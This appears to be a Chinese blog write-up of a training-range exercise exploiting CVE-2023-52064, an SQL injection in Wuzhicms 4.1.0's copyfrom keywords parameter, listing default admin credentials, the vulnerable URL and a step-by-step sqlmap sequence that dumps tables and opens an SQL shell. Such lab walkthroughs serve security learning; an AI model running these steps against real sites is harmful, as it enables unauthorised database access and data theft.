春秋云镜 CVE-2023-52064

靶标介绍:

Wuzhicms v4.1.0 被发现存在一个 SQL 注入漏洞,该漏洞通过位于`/core/admin/copyfrom.php` 的 `$keywords` 参数触发。

开启靶场:

打开靶场链接,如上图所示

开始实验:

1、通过安装Wuzhicms的知后台登录链接:靶场链接/www/index.php?m=core&f=index&v=login&_su=wuzhicms&_menuid=0

2、访问后台链接

http://eci-2zej9had9sp718wljgix.cloudeci1.ichunqiu.com/www/index.php?m=core&f=index&v=login&_su=wuzhicms&_menuid=0

3、使用用户名admin,密码admin123,刷新验证码进行登录

4、根据靶场介绍该漏洞通过位于`/core/admin/copyfrom.php` 的 `$keywords` 参数触发

5、查看登录后页面的源代码,搜索copyfrom,发现是改漏洞位于“模型管理”菜单栏

6、找到漏洞URL,使用m=core&f=copyfrom&v=listing替换m=core&f=index

/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms

7、访问漏洞url

8、使用burp抓包,“来源名称”输入1,点击搜索

9、保存request的raw的内容为55.txt

10、sqlmap判断注入漏洞,发现参数keywords存在注入漏洞

sqlmap.py -r 55.txt --batch

11、查看当前数据库

sqlmap.py -r 55.txt --batch --current-db

12、查看wuzhicms数据库表

sqlmap.py -r 55.txt --batch -D wuzhicms --tables

13、查看wuzhicms数据库、flllaaaag表的列

sqlmap.py -r 55.txt --batch -D wuzhicms -T flllaaaag --columns

14、爆破flag字段,得到flag

sqlmap.py -r 55.txt --batch -D wuzhicms -T flllaaaag -C flag --dump

或者第14步在知道数据库,表的情况下使用 ,直接出flag

sqlmap.py -r 55.txt --sql-shell
select * from flllaaaag

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-05-16 11:28:10       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-05-16 11:28:10       100 阅读
  3. 在Django里面运行非项目文件

    2024-05-16 11:28:10       82 阅读
  4. Python语言-面向对象

    2024-05-16 11:28:10       91 阅读

热门阅读

  1. 17.定浮点数与有符号数

    2024-05-16 11:28:10       38 阅读
  2. 代码随想录算法训练营第七天|

    2024-05-16 11:28:10       26 阅读
  3. JVM

    2024-05-16 11:28:10       21 阅读
  4. 第二天:深入部署与配置

    2024-05-16 11:28:10       32 阅读
  5. Unity3D 打造3D Astar寻路系统详解

    2024-05-16 11:28:10       39 阅读
  6. 创建空List的两种方法

    2024-05-16 11:28:10       34 阅读
  7. 在 CentOS 系统中升级 Python 版本

    2024-05-16 11:28:10       28 阅读
  8. GIN框架_模板渲染

    2024-05-16 11:28:10       33 阅读
  9. C++后端领域聚焦——存储系统和分布式系统

    2024-05-16 11:28:10       37 阅读
  10. NAT(网络地址转换)模式

    2024-05-16 11:28:10       32 阅读
  11. spring 约定优于配置 spring boot约定大于配置

    2024-05-16 11:28:10       33 阅读
  12. Springboot整合RabbitMq

    2024-05-16 11:28:10       29 阅读
  13. 【GoLang基础】函数体的注意事项和细节讨论

    2024-05-16 11:28:10       32 阅读